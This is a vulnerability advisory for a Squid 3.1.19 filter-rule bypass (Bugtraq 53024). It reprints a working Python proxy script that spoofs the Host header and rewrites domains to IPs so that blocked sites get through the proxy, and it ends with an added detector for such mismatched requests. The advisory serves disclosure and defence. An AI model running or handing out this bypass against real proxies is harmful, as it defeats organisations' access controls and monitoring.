Release date: 2012-04-16
Updated on: 2012-04-17
Affected Systems:
Squid Web Proxy Cache 3.1.19
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53024
Squid is an efficient web cache and proxy program. It was initially developed for the Unix platform and has since been ported to Linux and most Unix systems; the latest Squid can also run on Windows.
Squid has a security vulnerability in its implementation of filter rules. A successful attack allows the attacker to bypass certain security restrictions.
<* Source: Gabriel Menezes Nunes (gab.mnunes@gmail.com) *>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
Gabriel Menezes Nunes (gab.mnunes@gmail.com) provides the following test methods:
# Python 2 script (print statements, str-based sockets).
import socket, struct, sys, time
from threading import Thread

# The timeOut can be changed if the proxy is slow.
# Tested in GMail, Facebook, Youtube and several blocked sites.
# The proxy get the Host field of the http header and do not verify anything else.
# It trusts on the HTTP Header and it can be modified by the attacker.
timeOut = 0.8
isGet = 0
hostNameG = ""
pacoteGet = ""
port = 8080  # Listening port
proxyAddr = "vulnerableProxy.com"  # vulnerable proxy
proxyPort = 8080  # proxy port

def handle(client, globalSock):
    client.settimeout(timeOut)
    global hostNameG
    while 1:
        # Read one request from the local client until the socket goes quiet.
        dados = ""
        tam = 0
        while 1:
            try:
                dados2 = client.recv(1024)
                tam = tam + len(dados2)
                dados = dados + dados2
            except socket.timeout:
                break
        dd = dados.find("CONNECT")  # if the packet is a CONNECT METHOD
        if dd != -1:
            dd2 = dados.find(":")
            hostName = dados[dd + 8:dd2]
            ipAddr = socket.gethostbyname(hostName)  # changing the method to connect to the ip address, not the dns domain
            pacote = dados
            hostHeader = "Host: " + hostName
            pacote = pacote.replace(hostHeader, "Host: www.uol.com.br")  # changing the host field with a value that is accepted by the proxy
            pacote = pacote.replace(hostName, ipAddr)  # changing domain for ip
            dados = pacote
        getd = dados.find("GET ")
        getd2 = dados.find("//")
        getd3 = dados.find("/", getd2 + 2)
        hostName = dados[getd2 + 2:getd3]
        if getd != -1:
            # Plain GET: open a fresh connection to the proxy and tunnel it.
            globalSock.close()
            globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            globalSock.connect((proxyAddr, proxyPort))
            globalSock.settimeout(timeOut)
            getd2 = dados.find("//")
            getd3 = dados.find("/", getd2 + 2)
            hostName = dados[getd2 + 2:getd3]
            proxyAuth = ""
            proxyAuthN = dados.find("Proxy-Authorization:")
            if proxyAuthN != -1:
                proxyAuthNN = dados.find("\r\n", proxyAuthN)
                proxyAuth = dados[proxyAuthN:proxyAuthNN]
            ipAddr = socket.gethostbyname(hostName)
            info = "CONNECT " + ipAddr + ":80 HTTP/1.1\r\n"
            if proxyAuthN != -1:
                info += proxyAuth + "\r\n"
            info += "Host: www.uol.com.br\r\n"
            globalSock.send(info)
            # Drain the proxy's reply to the CONNECT.
            tam = 0
            gdata = ""
            while 1:
                try:
                    gdata2 = globalSock.recv(1024)
                    tam = tam + len(gdata2)
                    gdata = gdata + gdata2
                    if len(gdata2) == 0:
                        break
                except socket.timeout:
                    break
        # Forward the (possibly rewritten) request and relay the response.
        globalSock.send(dados)
        tam = 0
        gdata = ""
        while 1:
            try:
                gdata2 = globalSock.recv(1024)
                if len(gdata2) > 0:
                    client.send(gdata2)
                tam = tam + len(gdata2)
                gdata = gdata + gdata2
                if len(gdata2) == 0:
                    break
            except socket.timeout:
                break

print 'proxy bypass'
print 'by Gabriel Menezes Nunes'
print 'Tested on McAfee Web Gateway 7 and Squid proxy'
sockzao = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'attacked Proxy: ',
print proxyAddr
print 'listening on ',
print port
sockzao.bind(("", port))
sockzao.listen(6)
while 1:
    print 'waiting for connections'
    client, address = sockzao.accept()
    print 'client connected'
    print address
    globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    globalSock.connect((proxyAddr, proxyPort))
    globalSock.settimeout(timeOut)
    t = Thread(target=handle, args=(client, globalSock,))
    t.start()
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Squid
-----
Currently, the vendor has not provided a patch or upgrade. We recommend that users of the software watch the vendor's homepage to obtain the latest version:
http://www.squid-cache.org
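
Until a fixed version is available, requests of the kind described above can be flagged at a filtering layer or in log review. The following is an added example, not part of the original advisory and not Squid code: it compares the host in the request line with the Host header and reports a mismatch, a missing Host header, or a CONNECT to an IP literal. The function names and sample requests are constructed for illustration.

```python
# Added example: flag proxy requests whose Host header disagrees with the
# request-line target. Names and sample requests are constructed.
import ipaddress
from urllib.parse import urlsplit

def _host_only(authority):
    """Lower-cased host part of 'host[:port]' (IPv6 brackets handled)."""
    return (urlsplit("//" + authority).hostname or "").lower()

def parse_request(raw):
    """Return (method, target_host, host_header) from a raw proxy request."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    if method.upper() == "CONNECT":
        target_host = _host_only(target)  # authority-form: host:port
    else:
        target_host = (urlsplit(target).hostname or "").lower()  # absolute-form
    host_header = None
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "host":
            host_header = _host_only(value.strip())
            break
    return method.upper(), target_host, host_header

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def findings(raw):
    """List the reasons a request should not be filtered on its Host header."""
    method, target_host, host_header = parse_request(raw)
    out = []
    if host_header is None:
        out.append("missing-host")
    elif host_header != target_host:
        out.append("host-mismatch")
    if method == "CONNECT" and is_ip_literal(target_host):
        out.append("connect-to-ip")
    return out

# Constructed samples (192.0.2.10 is a documentation address, RFC 5737).
REWRITTEN = b"CONNECT 192.0.2.10:80 HTTP/1.1\r\nHost: www.uol.com.br\r\n\r\n"
ORDINARY = b"CONNECT mail.example.com:443 HTTP/1.1\r\nHost: mail.example.com:443\r\n\r\n"
```

A request that returns any finding should be evaluated against the filter rules using the request-line target, not the Host header.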